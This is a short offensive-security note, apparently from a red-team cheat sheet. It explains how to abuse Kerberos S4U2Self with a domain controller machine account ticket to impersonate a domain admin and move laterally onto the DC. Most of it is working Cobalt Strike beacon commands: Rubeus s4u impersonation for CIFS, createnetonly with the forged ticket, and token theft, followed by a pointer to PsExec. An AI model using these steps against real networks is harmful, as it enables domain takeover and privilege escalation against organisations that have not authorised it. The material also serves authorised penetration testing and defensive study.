S4U2Self can be used to leverage a domain controller machine account TGT to laterally move to the DC. This technique is valuable because machine accounts are not permitted to remote login into themselves. It’s worth noting that technically the attack should work on any target machine account that can authenticate to CIFS through delegation; it’s just that DCs by default have unconstrained delegation.

Exploit

To use the DC machine account ticket, first perform S4U2Self with a domain admin user (which is permitted to remote login to DC). Note the /self flag.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:[domain-admin] /self /altservice:cifs/[dc-fqdn] /user:[dc-account] /ticket:[dc-account-tgt-base64] /nowrap

We can then use the ticket to create a process under the domain admin’s account and assume its token.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[domain-admin] /password:[does-not-matter] /ticket:[s4u2self-tgs-base64]
 
beacon> steal_token $pid

Use things like PsExec to move to the DC (see Cobalt Strike beacon command list).